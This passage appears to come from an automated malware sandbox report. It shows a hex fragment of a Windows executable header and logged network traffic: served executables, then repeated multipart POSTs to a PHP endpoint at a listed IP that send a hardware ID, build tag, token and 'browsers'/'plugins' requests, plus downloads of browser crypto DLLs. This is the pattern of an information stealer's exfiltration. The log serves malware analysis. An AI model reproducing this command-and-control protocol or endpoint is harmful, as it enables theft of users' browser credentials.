9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:11 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:13 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 05:31:14 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEHost: 40.86.87.10Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 42 39 43 32 32 31 34 42 44 38 42 32 37 36 38 32 33 36 36 34 33 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 5a 4f 56 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"5B9C2214BD8B2768236643------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"ZOV------HDGIJJDGCBKFIDHIEBKE--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAHost: 40.86.87.10Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 44 47 43 47 44 41 41 41 4b 45 43 41 4b 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------BKJDGCGDAAAKECAKKJDAContent-Disposition: form-data; name="message"browsers------BKJDGCGDAAAKECAKKJDA--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGHDBKEBGIDHJJEHCAHost: 40.86.87.10Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 48 44 42 4b 45 42 47 49 44 48 4a 4a 45 48 43 41 2d 2d 0d 0a Data Ascii: ------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBGHDBKEBGIDHJJEHCAContent-Disposition: form-data; name="message"plugins------AEBGHDBKEBGIDHJJEHCA--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKFIJEGCAAFHJKFCFCHost: 40.86.87.10Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 46 49 4a 45 47 43 41 41 46 48 4a 4b 46 43 46 43 2d 2d 0d 0a Data Ascii: ------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------AEBKFIJEGCAAFHJKFCFCContent-Disposition: form-data; name="message"fplugins------AEBKFIJEGCAAFHJKFCFC--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJDAAEGIDHDGCAAFCBAHost: 40.86.87.10Content-Length: 5935Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/sqlite3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAAHost: 40.86.87.10Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKEBGIIDAFIDHIIECFHost: 40.86.87.10Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 40.86.87.10Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="file"------IJJJEBFHDBGIECBFCBKJ--
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJKHost: 40.86.87.10Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="token"b7161b6b704d6603da22fdac66db5396cafc9bd5976cbc684762e42ee25308426ba0ad93------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="file"------GDGDHJJDGHCAAAKEHIJK--
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/freebl3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/mozglue.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/msvcp140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/nss3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/softokn3.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b13597c85f807692/vcruntime140.dll HTTP/1.1Host: 40.86.87.10Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 40.86.87.10Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /108e010e8f91c38c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBKECAKFBGCAKECGIEHost: 40.86.87.10Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 37 31 36 31 62 36 62 37 30 34 64 36 36 30 33 64 61 32 32 66 64 61 63 36 36 64 62 35 33 39 36 63 61 66 63 39 62 64 35 39 37 36 63 62 63 36 38 34 37 36 32 65 34 32 65 65 32 35 33 30 38 34 32 36 62 61 30 61 64 39 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 4b 45 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 